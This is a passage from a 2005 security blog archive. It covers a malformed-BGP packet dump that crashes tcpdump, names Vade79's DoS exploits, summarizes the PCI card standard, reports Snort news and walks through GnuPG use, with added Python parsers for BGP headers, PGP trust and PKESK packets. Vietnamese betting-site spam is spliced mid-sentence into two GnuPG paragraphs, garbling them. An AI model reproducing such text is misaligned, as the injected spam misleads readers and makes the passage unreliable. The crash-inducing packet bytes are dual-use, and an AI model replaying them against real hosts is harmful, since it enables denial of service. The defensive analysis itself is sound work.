0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D8 80 11 .......%.>z.....
0x0030: 82 18 62 90 00 00 01 01 08 0A 0C 65 15 73 08 B1 ..b........e.s..
0x0040: 4E EA N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396922 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:38046 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x7ADA03D8 Ack: 0xA425913F Win: 0x8217 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837802 207951219
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 94 9E 40 00 40 06 22 CF C0 A8 01 05 C0 A8 .4..@.@.".......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 D8 A4 25 91 3F 80 10 ......z....%.?..
0x0030: 82 17 62 91 00 00 01 01 08 0A 08 B1 4E EA 0C 65 ..b.........N..e
0x0040: 15 73 .s

Here is sample traffic for you to try: bgp-dos.taosecurity.lpc. You should be able to run this through Tcpdump using the -r option without killing Tcpdump.
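To see what the last PSH/ACK segment in that dump actually carries, here is an added Python example. It is my own code, not part of the original post, of Tcpdump, or of any of the exploits mentioned here, and it does not explain why Tcpdump crashes; it only reads the bytes. It rebuilds the frame from the Snort hex dump printed above, walks Ethernet, IPv4 and TCP to the payload, and checks the BGP header against the sanity rules of RFC 4271 (16-byte marker, length between 19 and 4096, per-type minimum length; the BGP_MIN_LEN table and the wording of the findings are mine). On this packet the header declares a 19-byte UPDATE, four bytes short of the minimum, and the 16 bytes after it carry no marker at all.

```python
import re
import struct

# The 87-byte PSH/ACK segment from 192.168.1.5:57471 to 192.168.1.1:179,
# copied verbatim from the Snort dump above (BGP payload starts at 0x42).
SNORT_HEX_DUMP = """\
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 57 93 A8 40 00 40 06 23 A2 C0 A8 01 05 C0 A8 .W..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 18 ......z....%.>..
0x0030: 82 18 DC FF 00 00 01 01 08 0A 08 B1 4E B7 0C 65 ............N..e
0x0040: 15 0D FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
0x0050: FF FF 00 13 02 00 01 00 FF 00 FF 0E 00 FF 00 01 ................
0x0060: 84 00 00 00 00 .....
"""

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")
BGP_MARKER = b"\xff" * 16
BGP_MAX_LEN = 4096
BGP_TYPES = {1: "OPEN", 2: "UPDATE", 3: "NOTIFICATION", 4: "KEEPALIVE", 5: "ROUTE-REFRESH"}
BGP_MIN_LEN = {1: 29, 2: 23, 3: 21, 4: 19, 5: 23}   # RFC 4271 / RFC 2918 minimums


def bytes_from_snort_dump(text: str) -> bytes:
    """Rebuild raw frame bytes from Snort's '0xNNNN: hh hh ... ascii' lines."""
    out = bytearray()
    for line in text.splitlines():
        if not line.lstrip().startswith("0x"):
            continue
        line_bytes = []
        for tok in line.split(":", 1)[1].split():
            # Snort prints at most 16 bytes per line; the ASCII column follows.
            if len(line_bytes) == 16 or not HEX_BYTE.match(tok):
                break
            line_bytes.append(int(tok, 16))
        out.extend(line_bytes)
    return bytes(out)


def tcp_payload(frame: bytes) -> bytes:
    """Walk Ethernet -> IPv4 -> TCP and return the TCP payload."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        raise ValueError("not an IPv4-over-Ethernet frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != 6:
        raise ValueError("not TCP")
    tcp = ip[ihl:total_len]           # bounded by the IP total length, not the dump
    data_off = (tcp[12] >> 4) * 4
    return tcp[data_off:]


def parse_bgp_stream(payload: bytes) -> list:
    """Split a TCP payload into BGP messages, recording header sanity violations."""
    msgs = []
    off = 0
    while off < len(payload):
        hdr = payload[off:off + 19]
        if len(hdr) < 19:
            msgs.append({"offset": off, "length": len(hdr), "type": None,
                         "findings": [f"truncated header ({len(hdr)} of 19 bytes)"]})
            break
        length, mtype = struct.unpack("!H", hdr[16:18])[0], hdr[18]
        remaining = len(payload) - off
        findings = []
        if hdr[:16] != BGP_MARKER:
            findings.append("marker is not 16 x 0xFF")
        if not 19 <= length <= BGP_MAX_LEN:
            findings.append(f"length {length} outside 19..{BGP_MAX_LEN}")
        elif length > remaining:
            findings.append(f"length {length} exceeds the {remaining} bytes remaining")
        name = BGP_TYPES.get(mtype)
        if name is None:
            findings.append(f"unknown message type {mtype}")
        elif length < BGP_MIN_LEN[mtype]:
            findings.append(f"{name} shorter than minimum {BGP_MIN_LEN[mtype]} bytes")
        msgs.append({"offset": off, "length": length, "type": name, "findings": findings})
        # Step by the declared length, but never by less than one header: a
        # length field below 19 must not be allowed to stall or rewind the parser.
        off += max(length, 19)
    return msgs


if __name__ == "__main__":
    for m in parse_bgp_stream(tcp_payload(bytes_from_snort_dump(SNORT_HEX_DUMP))):
        print(m)
```

Run it and the first entry is the 19-byte UPDATE with its minimum-length finding; the second is the 16 leftover bytes, which do not even form a header. The same three functions can be pointed at any Snort or tcpdump -X hex dump of port 179 traffic.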

Vade79 also released exploits titled xtcpdump-isis-dos.c and xtcpdump+ethr-rsvp-dos.c, for Intermediate System to Intermediate System (IS-IS) and the Resource ReSerVation Protocol (RSVP), respectively.

While I could get all four exploits to compile on FreeBSD, I could not get these last two to generate traffic. I believe the problem lies with the spoofing mechanism in each exploit. I was only able to get the first two exploits to work when I enabled the "nospoof" options.

Keep an eye on Tcpdump.org and the tcpdump-workers mailing list for developments. The latest tcpdump-current.tar.gz or CVS check-outs should be patched. I also expect to see a Tcpdump 3.9.0 official release patched against these problems next week.

Wednesday, April 27, 2005

Payment Card Industry Security Guidelines

I heard about this back in December, but it slipped off my radar. Now news outlets like The Register and News.com are reporting on the Payment Card Industry (PCI) Data Security Standard. Prior to standardization on the PCI, vendors had to juggle the Visa Cardholder Information Security Program (CISP), the MasterCard Site Data Protection Program, the American Express Data Security Operating Policy (DSOP), and the Discover Information Security and Compliance (DISC) document.

The PCI was publicized back in December when Visa released a memo (available in .pdf form here) letting vendors know what was happening.

The PCI standard consists of twelve requirements:

Build and Maintain a Secure Network
1. Install and maintain a firewall configuration to protect data
2. Do not use vendor-supplied defaults for system passwords and other security parameters

Protect Cardholder Data
3. Protect stored data
4. Encrypt transmission of cardholder data and sensitive information across public networks

Maintain a Vulnerability Management Program
5. Use and regularly update anti-virus software
6. Develop and maintain secure systems and applications

Implement Strong Access Control Measures
7. Restrict access to data by business need-to-know
8. Assign a unique ID to each person with computer access
9. Restrict physical access to cardholder data

Regularly Monitor and Test Networks
10. Track and monitor all access to network resources and cardholder data
11. Regularly test security systems and processes

Maintain an Information Security Policy
12. Maintain a policy that addresses information security

Visa's Cardholder Information Security Program page has the most browsable online content, but the Mastercard page has information as well.

Merchant e-Solutions summarizes PCI, with a note that level 2 (150,000 to 6,000,000 transactions per year) and level 3 (20,000 to 150,000 transactions per year) merchants require validation by a "Qualified Independent Scan Vendor" no later than June 30, 2005. Some documents also mention a "Qualified Independent Security Assessor." I've emailed Visa to find out how a vendor becomes "qualified," although one of my friends is already taking his security company through the process.

I think helping merchants meet these standards will usher in a new wave of assessment business for security vendors. On a smaller scale, requirements to "Regularly Monitor and Test Networks" include intrusion detection and traffic audit components, so I look forward to participating in this process myself.

I noticed Foundstone offers a series of Webcasts on PCI and other standards. Regarding other standards, Application Security Inc. helpfully summarizes several of them in one place.

Update: I just got this email from Visa:

Thank you for your interest in the Visa CISP program. Visa is unable to qualify additional security assessors at this time. We are, however, currently considering opening the qualification program again to accept new security assessors. We will keep your information on file and respond if the program opens again. We will also make this information available on the website, so be sure to check back periodically.

Your company may certainly assist companies in meeting and maintaining compliance with the CISP requirements. Unfortunately, Visa is unable to review compliance solutions at this time.

MasterCard owns the scan vendor qualification program. You will need to contact MasterCard to apply for the program. https://sdp.mastercardintl.com/

Regards,
The CISP Team
http://www.visa.com/cisp

Update 2: Here is Visa's list of Qualified Independent Security Assessors in .pdf format. Here is Mastercard's list of Qualified Independent Scan Vendors. Mastercard explains their vendor certification process on that page, but they have not yet responded to the email I sent yesterday. Mastercard does provide a Web-based form to let candidate vendors begin the certification process.

Update 3: I got an email from Mastercard pointing me to the resources I outlined earlier. The sender said Mastercard charges $5,000 to become a Qualified Independent Scan Vendor. How can they possibly justify this cost? Unlike Visa, however, Mastercard is currently accepting new applicants to become Qualified Independent Scan Vendors.

Tuesday, April 26, 2005

Snort Developments

I have a few news items from the Snort world. First, Snort 2.3.3 was released. This should not have any new rules, as it's not Snort 2.4.0 or Snort 3.0.0. Snort 2.3.3 does feature a so-called "mini-preprocessor" to watch for attacks exploiting Vulnerability in Exchange Server Allows Remote Code Execution (MS05-021). Code to allegedly test for the vulnerability is here, so you might want to try testing Snort 2.3.3 with it.

Second, the Open Source Snort Rules Consortium ossrc-intro mailing list is operational. Currently the lead thread is asking for comments on the latest OSSRC Charter, dated 22 March 2005. This is the same document I previously examined.

Saturday, April 23, 2005

Sending Encrypted Email

In previous blog entries I've created GnuPG keys and decrypted a message encrypted with my public GnuPG key. In this entry I show how I respond with an encrypted email using Enigmail and how I encrypt a file using gpg at the command line.

You'll remember Bob sent me an encrypted email. I decided to send Bob an encrypted email in return. The first task was to find his public key. I used the key search feature. You may remember Bob included pgp.mit.edu in his signature as a hint for where to look for his public key, so I pass that site as the keyserver.

orr:/home/richard$ gpg --keyserver pgp.mit.edu --search-keys rgrabowsky_at_rasecurity_dot_com
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: searching for "rgrabowsky_at_rasecurity_dot_com" from hkp server pgp.mit.edu
(1) Bob Grabowsky bob_at_infotech-nj_dot_com
Bob Grabowsky robertg_at_InfoTech-NJ_dot_com
Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
Bob Grabowsky rgrabowsky_at_rasecuritysystems_dot_com
1024 bit DSA key 7932C9E3, created: 2001-05-27
Enter number(s), N)ext, or Q)uit > 1
gpg: requesting key 7932C9E3 from hkp server pgp.mit.edu
gpg: key 7932C9E3: public key "Robert Grabowsky " imported
gpg: Total number processed: 1
gpg: imported: 1

That was easy. Because I found cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 key and selected it, GnuPG imported it automatically. I can verify that.

orr:/home/richard$ gpg --list-keys
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/pubring.gpg
--------------------------------
pub 1024D/752B57C7 2005-04-23
uid Richard Bejtlich richard_at_taosecurity_dot_com
sub 2048g/8BA44991 2005-04-23

pub 1024D/7932C9E3 2001-05-27
uid Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
uid Bob Grabowsky bob_at_infotech-nj_dot_com
uid Bob Grabowsky robertg_at_InfoTech-NJ_dot_com
uid Bob Grabowsky rgrabowsky_at_rasecuritysystems_dot_com
sub 1024g/8F0D6977 2001-05-27

Another alternative is to check a Web-based keyserver search form. I visited www.pgp.net/pgpnet/wwwkeys.html and searched on Bob's last name. Here are the pertinent results, with email addresses altered slightly to spoil harvesters.

pub 1024D/7932C9E3 2001-05-27 Bob Grabowsky bob_at_infotech-nj_dot_com
Bob Grabowsky robertg_at_InfoTech-NJ_dot_com
Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
Bob Grabowsky rgrabowsky_at_rasecuritysystems_dot_com

Notice the key ID of 7932C9E3. This is the same value that appeared in Bob's signature in the message he sent to me. This must be the right public key. (A 32-bit key ID is only a convenience, though: anyone can generate a key with the same short ID, so the full fingerprint, compared out of band as described later in this entry, is the real test.) I've already imported the key with GnuPG, but if I wanted to use the key stored on this Web-based keyserver, I would download the key linked to these results. I would then use the import command.

So how did I respond to Bob's email? Enigmail made it easy. I decided to reply, and Enigmail asked if I wanted to configure Enigmail to import Bob's public key. In a second window I confirmed that I wanted Enigmail to use Bob's email address to locate his public key. When I selected 'send', I briefly saw my message in ASCII-armored format like this.

-----BEGIN PGP MESSAGE-----
Charset: ISO-8859-1
Version: GnuPG v1.4.0 (FreeBSD)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

hQEOAzf/9vKPDWl3EAQAqmMHJKxFtj1oN2NV0wUGvNmYTXvazSSiWg3iPzNix+n0
i5qajeTQ+v6PSlY5SvMwDaW6Ojp6MtsQ90O5IrrE1TBfSeDpO6EbQ2Vd0xhdGNtT
...truncated...

Then it was on its way, and it appeared in clear text in my Thunderbird window. Because I also asked Enigmail to sign the message for me, I saw signature and key icons in the Thunderbird window indicating gpg had signed and encrypted my reply.

Earlier I mentioned importing a key from a file. As an example I import Bamm Visscher's public key, retrieved from the Web-accessible keyserver.

orr:/home/richard$ gpg --import bamm.asc
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: key 593C82C4: public key "Bamm Visscher (Senior
Engineer/Managed Security Services) rvisscher_at_saball_dot_com" imported
gpg: Total number processed: 1
gpg: imported: 1

Let's say I wanted to send an encrypted file to Bamm. The file is secret.txt. Here's how I would encrypt it. First I verify his user ID.

orr:/home/richard$ gpg --list-keys Bamm Visscher
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
pub 1024D/593C82C4 2001-06-26
uid Bamm Visscher (Senior Engineer/Managed Security Services)
rvisscher_at_saball_dot_com
sub 1024g/A3D3321B 2001-06-26

His UID is "Bamm Visscher". Now I encrypt secret.txt.

orr:/home/richard$ gpg -sear "Bamm Visscher" secret.txt
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

gpg: A3D3321B: There is no assurance this key belongs to the named user

pub 1024g/A3D3321B 2001-06-26 Bamm Visscher
(Senior Engineer/Managed Security Services) rvisscher_at_saball_dot_com
Primary key fingerprint: 7FA4 8692 4707 D567 E0D7 5835 416C 0915 593C 82C4
Subkey fingerprint: 4282 C306 F28B C630 8057 50EC E3E1 FEE5 A3D3 321B

It is NOT certain that the key belongs to the person named
in the user ID. If you *really* know what you are doing,
you may answer the next question with yes.

Use this key anyway? (y/N) y

The 's' switch signs the file. The 'e' switch specifies encryption. The 'a' switch tells gpg to create an ASCII-armored file suitable for transport via email text. The 'r' switch says a recipient follows, e.g. "Bamm Visscher"; gpg matches that string against user IDs, so giving the key ID instead (-r 0x593C82C4) avoids picking the wrong key when more than one user ID contains the same name.

You'll notice gpg complained that it couldn't be sure Bamm's public key belonged to him. This is where the key fingerprint and a call to Bamm come into play. If I wanted to verify the authenticity of Bamm's public key, I would call him and ask him to tell me his fingerprint. Since it matches the value posted above, I know he is the owner of this public key. When I trust his key, then I can sign it with my own as follows.

orr:/home/richard$ gpg --sign-key A3D3321B
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

pub 1024D/593C82C4 created: 2001-06-26 expires: never usage: CSA
trust: unknown validity: unknown
sub 1024g/A3D3321B created: 2001-06-26 expires: never usage: E
[ unknown] (1). Bamm Visscher (Senior Engineer/Managed Security Services)


pub 1024D/593C82C4 created: 2001-06-26 expires: never usage: CSA
trust: unknown validity: unknown
Primary key fingerprint: 7FA4 8692 4707 D567 E0D7 5835 416C 0915 593C 82C4

Bamm Visscher (Senior Engineer/Managed Security Services)
rvisscher_at_saball_dot_com

Are you sure that you want to sign this key with your
key "Richard Bejtlich richard_at_taosecurity_dot_com" (752B57C7)

Really sign? (y/N) y

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

Let's say I now want to send Bamm secret2.txt in encrypted form. Does gpg complain after I've signed Bamm's public key?

orr:/home/richard$ gpg -sear "Bamm Visscher" secret2.txt
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

gpg: checking the trustdb
gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model
gpg: depth: 0 valid: 1 signed: 1 trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: depth: 1 valid: 1 signed: 0 trust: 1-, 0q, 0n, 0m, 0f, 0u

No problems. If I wanted to upload this signed key to a keyserver, I could use this syntax.

gpg --keyserver [keyserver] --send-key [Key_ID]
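The "3 marginal(s) needed, 1 complete(s) needed, PGP trust model" lines above describe the rule gpg used to decide that Bamm's key is now valid: my key is ultimately trusted at depth 0, and one certification from it makes his key fully valid at depth 1. The Python below is an added, deliberately simplified model of that rule, my own code and not GnuPG's; it ignores expiry, revocation, trust signatures and the "never" owner-trust level, which real gpg also consults. The key ring it runs on is constructed: "richard" and "bamm" mirror this entry, the other names are made up to exercise the marginal and complete thresholds.

```python
# Owner-trust levels that count toward another key's validity.
ULTIMATE, FULL, MARGINAL = "ultimate", "full", "marginal"
# Validity a key can end up with.
VALID_FULL, VALID_MARGINAL, VALID_UNKNOWN = "full", "marginal", "unknown"

# Constructed key ring. Owner trust is what 'gpg --edit-key ... trust' records;
# SIGNATURES maps a key to the keys that have certified it.
OWNER_TRUST = {"richard": ULTIMATE, "bamm": MARGINAL, "carol": MARGINAL,
               "dave": MARGINAL, "erin": FULL}
SIGNATURES = {
    "bamm": ["richard"], "carol": ["richard"], "dave": ["richard"], "erin": ["richard"],
    "frank": ["bamm", "carol", "dave"],   # three marginally trusted certifiers
    "grace": ["bamm"],                    # one marginally trusted certifier
    "heidi": ["erin"],                    # one fully trusted certifier
    "ivan": ["frank"],                    # certifier is valid but has no owner trust
}


def compute_validity(owner_trust, signatures, marginals_needed=3,
                     completes_needed=1, max_cert_depth=5):
    """Return (validity, depth) for every key under the classic PGP trust rule.

    Ultimately trusted keys are valid at depth 0. Level by level, a key becomes
    fully valid once it carries completes_needed certifications from fully
    valid keys with full (or ultimate) owner trust, or marginals_needed from
    fully valid keys with marginal owner trust. Only fully valid keys certify.
    """
    keys = set(owner_trust) | set(signatures)
    for certifiers in signatures.values():
        keys.update(certifiers)
    validity = {k: VALID_UNKNOWN for k in keys}
    depth = {}
    for k, t in owner_trust.items():
        if t == ULTIMATE:
            validity[k], depth[k] = VALID_FULL, 0

    for level in range(1, max_cert_depth + 1):
        snapshot = dict(validity)          # decide each level from the previous one
        promoted = {}
        for key, certifiers in signatures.items():
            if snapshot[key] == VALID_FULL:
                continue
            full = marginal = 0
            for c in certifiers:
                if snapshot.get(c) != VALID_FULL:
                    continue               # an invalid key's signature counts for nothing
                t = owner_trust.get(c)
                if t in (ULTIMATE, FULL):
                    full += 1
                elif t == MARGINAL:
                    marginal += 1
            if full >= completes_needed or marginal >= marginals_needed:
                promoted[key] = level
            elif full + marginal > 0:
                validity[key] = VALID_MARGINAL
        if not promoted:
            break
        for key, lvl in promoted.items():
            validity[key], depth[key] = VALID_FULL, lvl
    return validity, depth


def depth_summary(depth):
    """Count fully valid keys per depth, like gpg's 'depth: N valid: M' lines."""
    summary = {}
    for lvl in depth.values():
        summary[lvl] = summary.get(lvl, 0) + 1
    return dict(sorted(summary.items()))


if __name__ == "__main__":
    validity, depth = compute_validity(OWNER_TRUST, SIGNATURES)
    for k in sorted(validity):
        print(f"{k:8s} validity={validity[k]:8s} depth={depth.get(k, '-')}")
    print(depth_summary(depth))
```

Raising marginals_needed to 4 drops frank to marginal validity while heidi, certified by a fully trusted key, stays valid; capping max_cert_depth at 1 leaves everything beyond the keys I signed directly unknown. Those two knobs are the --marginals-needed and --max-cert-depth options gpg reports in the trustdb lines.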

I wrote these three blog entries to document how I got GnuPG running and working with Thunderbird. There are many GnuPG tutorials and documents online, and I recommend referencing them for more information. Thanks to Bob for sending a test message.

Decrypting Encrypted Email

No sooner had I posted my last entry on creating a GnuPG key than a visitor sent me an encrypted email. My mail client is Thunderbird, and it promptly put a message from Robert Grabowsky into my Junk folder. Thunderbird suspected the message was spam! It looked like this. Certain fields have been edited to foil email address harvesting:

Date: Sat, 23 Apr 2005 17:26:37 -0400 (EDT)
From: Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
To: Richard Bejtlich richard_at_taosecurit_dot_com
Subject: test of your key

-----BEGIN PGP MESSAGE-----

hQIOA+vNZOSLpEmREAf/XTL0KqQAnwOIkONZGgZMsyEFD00O7O8qzNRmv7A/IVwg
o95VmxSoUXDIwNtQG1QpSbTY217k/HmUEKup0n2laON49SGKj1H76SwS0BVNG8Xj
...edited...
ADc/eiJOmnZuhDhTYMJoqziAilKf9Y7ChHKKjtil2WTrnNL3qfwX5636Sb3sjFMg
f1Q+WCHWMr9LOQG3JGmGfjNZe6iMzp+Wl5y7m/j+7HMwiVp+J2sHyx1pffnGtFgP
=Xa7M
-----END PGP MESSAGE-----

To manually decrypt this message, I saved the message body into a file called msg.txt. Then I used gpg to decrypt it.

orr:/home/richard$ gpg -d msg.txt
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
2048-bit ELG-E key, ID 8BA44991, created 2005-04-23 (main key ID 752B57C7)

gpg: encrypted with 2048-bit ELG-E key, ID 8BA44991, created 2005-04-23
"Richard Bejtlich richard_at_taosecurity_dot_com"
Hi Richard,

Here's a quick test of your GnuPG key. Keep up the great work on the
blog, I check it every day!!!

Best Regards,
Bob

Robert Grabowsky, CISSP | Ra Security Systems, Inc.
rgrabowsky_at_rasecurity_dot_com | GPG KeyID 0x7932C9E3 (pgp.mit.edu)
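Both armored messages on this page, my reply to Bob in the "Sending Encrypted Email" entry above and Bob's message here, begin with a Public-Key Encrypted Session Key packet whose header names the key the session key was wrapped for. The Python below is an added example of mine, not part of the original entries or of GnuPG: it strips the armor, parses the OpenPGP packet header (RFC 4880 section 4.2, old and new format) and reads the PKESK fields (section 5.1). Only the first 64-character base64 line of each message is embedded, copied from the page, since the rest was truncated there; 48 bytes is enough. The result shows that gpg encrypts to the Elgamal encryption subkey (8F0D6977 in Bob's "sub" line, 8BA44991 in mine), not to the primary DSA key, which is exactly what gpg printed as "encrypted with 2048-bit ELG-E key, ID 8BA44991" above.

```python
import base64

# Public-key algorithm IDs from RFC 4880 section 9.1.
PK_ALGOS = {1: "RSA", 2: "RSA (encrypt-only)", 3: "RSA (sign-only)",
            16: "Elgamal (encrypt-only)", 17: "DSA", 18: "ECDH", 19: "ECDSA"}

# Armor header plus the first base64 line of each message shown on this page.
REPLY_TO_BOB = """-----BEGIN PGP MESSAGE-----
Charset: ISO-8859-1
Version: GnuPG v1.4.0 (FreeBSD)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

hQEOAzf/9vKPDWl3EAQAqmMHJKxFtj1oN2NV0wUGvNmYTXvazSSiWg3iPzNix+n0
"""
MESSAGE_FROM_BOB = """-----BEGIN PGP MESSAGE-----

hQIOA+vNZOSLpEmREAf/XTL0KqQAnwOIkONZGgZMsyEFD00O7O8qzNRmv7A/IVwg
"""


def dearmor_prefix(armored: str) -> bytes:
    """Decode the base64 body of an armored block; tolerates a truncated body."""
    body, in_body = [], False
    for line in armored.splitlines():
        line = line.strip()
        if line.startswith("-----BEGIN"):
            continue
        if not in_body:
            in_body = line == ""        # armor headers end at the first blank line
            continue
        if line.startswith("=") or line.startswith("-----END"):
            break                       # CRC-24 line or end marker
        body.append(line)
    b64 = "".join(body)
    b64 = b64[: len(b64) - len(b64) % 4]   # drop a partial quantum, if any
    return base64.b64decode(b64)


def packet_header(data: bytes):
    """Return (tag, body_offset, body_length) for an OpenPGP packet header.

    body_length is None for an indeterminate or partial-body length."""
    ctb = data[0]
    if not ctb & 0x80:
        raise ValueError("not an OpenPGP packet (bit 7 clear)")
    if ctb & 0x40:                                  # new-format header
        tag, first = ctb & 0x3F, data[1]
        if first < 192:
            return tag, 2, first
        if first < 224:
            return tag, 3, ((first - 192) << 8) + data[2] + 192
        if first == 255:
            return tag, 6, int.from_bytes(data[2:6], "big")
        return tag, 2, None
    tag, ltype = (ctb >> 2) & 0x0F, ctb & 0x03      # old-format header
    if ltype == 3:
        return tag, 1, None
    nbytes = (1, 2, 4)[ltype]
    return tag, 1 + nbytes, int.from_bytes(data[1:1 + nbytes], "big")


def parse_pkesk(armored: str) -> dict:
    """Read the leading Public-Key Encrypted Session Key packet (tag 1)."""
    data = dearmor_prefix(armored)
    tag, off, length = packet_header(data)
    if tag != 1:
        raise ValueError(f"first packet is tag {tag}, not a PKESK")
    key_id = data[off + 1:off + 9]
    algo = data[off + 9]
    return {
        "version": data[off],
        "packet_length": length,
        "key_id": key_id.hex().upper(),
        "short_key_id": key_id.hex().upper()[-8:],
        "wildcard_recipient": key_id == b"\x00" * 8,   # gpg --hidden-recipient
        "algorithm": PK_ALGOS.get(algo, f"unknown ({algo})"),
        "first_mpi_bits": int.from_bytes(data[off + 10:off + 12], "big"),
    }


if __name__ == "__main__":
    for label, msg in (("reply to Bob", REPLY_TO_BOB), ("message from Bob", MESSAGE_FROM_BOB)):
        print(label, parse_pkesk(msg))
```

The first MPI is the Elgamal value g^k mod p: 1024 bits for Bob's 1024g subkey, 2047 for my 2048g subkey because the top bit of that particular value happens to be zero. An all-zero key ID would mean the sender hid the recipient, and a leading tag other than 1 (for example tag 3, a symmetric-key ESK) would mean the message was not public-key encrypted at all.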

An excellent alternative to manual decryption is Enigmail, a plug-in for Thunderbird and the Mozilla client. I installed the mail/enigmail-thunderbird FreeBSD package and then fired up Thunderbird. I had a new menu item called "Enigmail". When I highlighted Bob's message, Enigmail began a simple setup procedure.

It asked me to enter my private GnuPG passphrase, then it wanted to know where the gpg binary resided. I entered /usr/local/bin/gpg. With that, the message was decrypted automatically. Now when I see the message within Thunderbird, it appears as clear text.

Now I needed to send a reply. I will cover that in a future blog posting shortly.

Simple GnuPG Key Creation

I was recently asked to provide my GnuPG public key to facilitate sharing encrypted documents. I realized I needed to set up a public key with my richard at taosecurity dot com mailing address. Here's how I did it. First I installed the FreeBSD security/gnupg-devel package. Then I was ready to begin. I started by creating my key. Where necessary I've modified my email address in the listing below to spoil simple harvesting methods.

orr:/home/richard$ gpg --gen-key
gpg (GnuPG) 1.4.0; Copyright (C) 2004 Free Software Foundation, Inc.
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See the file COPYING for details.

gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: directory `/home/richard/.gnupg' created
gpg: new configuration file `/home/richard/.gnupg/gpg.conf' created
gpg: WARNING: options in `/home/richard/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/home/richard/.gnupg/secring.gpg' created
gpg: keyring `/home/richard/.gnupg/pubring.gpg' created
Please select what kind of key you want:
(1) DSA and Elgamal (default)
(2) DSA (sign only)
(5) RSA (sign only)
Your selection? 1
DSA keypair will have 1024 bits.
ELG-E keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048)
Requested keysize is 2048 bits
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0) 0
Key does not expire at all
Is this correct? (y/N) y

You need a user ID to identify your key; the software constructs the user ID
from the Real Name, Comment and Email Address in this form:
"Heinrich Heine (Der Dichter) heinrichh@duesseldorf.de"

Real name: Richard Bejtlich
Email address: richard_at_taosecurity_dot_com
Comment:
You selected this USER-ID:
"Richard Bejtlich richard_at_taosecurity_dot_com"

Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o
You need a Passphrase to protect your secret key.

Enter passphrase:

Repeat passphrase:

We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
++++++++++.
gpg: /home/richard/.gnupg/trustdb.gpg: trustdb created
gpg: key 752B57C7 marked as ultimately trusted
public and secret key created and signed.

gpg: checking the trustdb
gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model
gpg: depth: 0 valid: 1 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 1u
pub 1024D/752B57C7 2005-04-23
Key fingerprint = 2B43 9A2E 6925 D581 5E34 FD6B 020C E655 752B 57C7
uid Richard Bejtlich richard_at_taosecurity_dot_com
sub 2048g/8BA44991 2005-04-23

That's it. I cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n listed my keys.

orr:/home/richard$ gpg --list-keys
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/pubring.gpg
--------------------------------
pub 1024D/752B57C7 2005-04-23
uid Richard Bejtlich richard_at_taosecurity_dot_com
sub 2048g/8BA44991 2005-04-23

orr:/home/richard$ gpg --list-secret-keys
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/secring.gpg
--------------------------------
sec 1024D/752B57C7 2005-04-23
uid Richard Bejtlich richard_at_taosecurity_dot_com
ssb 2048g/8BA44991 2005-04-23

Here's how to see the key fingerprint. The fingerprint is a hash of the public key, a shorthand that lets someone confirm out of band (by phone, say) that the key they fetched is really mine.

orr:/home/richard$ gpg --fingerprint
gpg: WARNING: using insecure memory!
